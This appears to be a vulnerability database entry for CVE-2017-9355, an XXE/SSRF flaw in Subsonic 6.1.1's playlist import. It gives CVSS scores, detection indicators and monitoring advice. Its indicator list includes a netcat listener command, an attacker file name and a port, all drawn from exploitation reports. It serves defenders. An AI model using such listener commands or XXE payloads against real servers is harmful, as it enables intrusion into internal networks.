cbcvebase.
CVE-2017-9355
published 2017-06-07

CVE-2017-9355: XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery…

PriorityP260high7.4CVSS 3.0
AVNACLPRNUIRSCCNIHAN
EXPLOIT
EPSS
26.91%
97.8th percentile
XML external entity (XXE) vulnerability in the import playlist feature in Subsonic 6.1.1 might allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted XSPF playlist file.

Affected

1 ranges
VendorProductVersion rangeFixed in
subsonicsubsonic

Detection & IOCsextracted from sources · hover to see the quote

filenameRainbowsNUnic0rns.xspf
port1337
uaJava/1.8.0_45
commandnc.exe -llvp 1337
  • Monitor HTTP requests to Subsonic's import playlist endpoint for uploads of .xspf files containing DOCTYPE declarations or ENTITY definitions, which are indicative of XXE payloads.
  • Detect outbound HTTP connections from the Subsonic server process carrying the Java HTTP client User-Agent header, which is the callback mechanism used in XXE/SSRF exploitation of this vulnerability.
  • Alert on inbound XSPF playlist files containing XML external entity declarations (%mmmm; or similar parameter entity references) during playlist import operations.
  • The XXE attack results in server-side HTTP GET requests originating from the Subsonic host to attacker-controlled or internal network targets; monitor for unexpected outbound GET requests with Java HTTP client headers from the media server.
  • ·Exploitation requires user interaction — a user must be socially engineered into importing the malicious .xspf playlist file through the Subsonic UI.
  • ·The XXE/SSRF attack vector can be used to pivot to internal network hosts behind a firewall, not just external internet targets, expanding the blast radius beyond the Subsonic server itself.

CVSS provenance

nvdv3.07.4HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.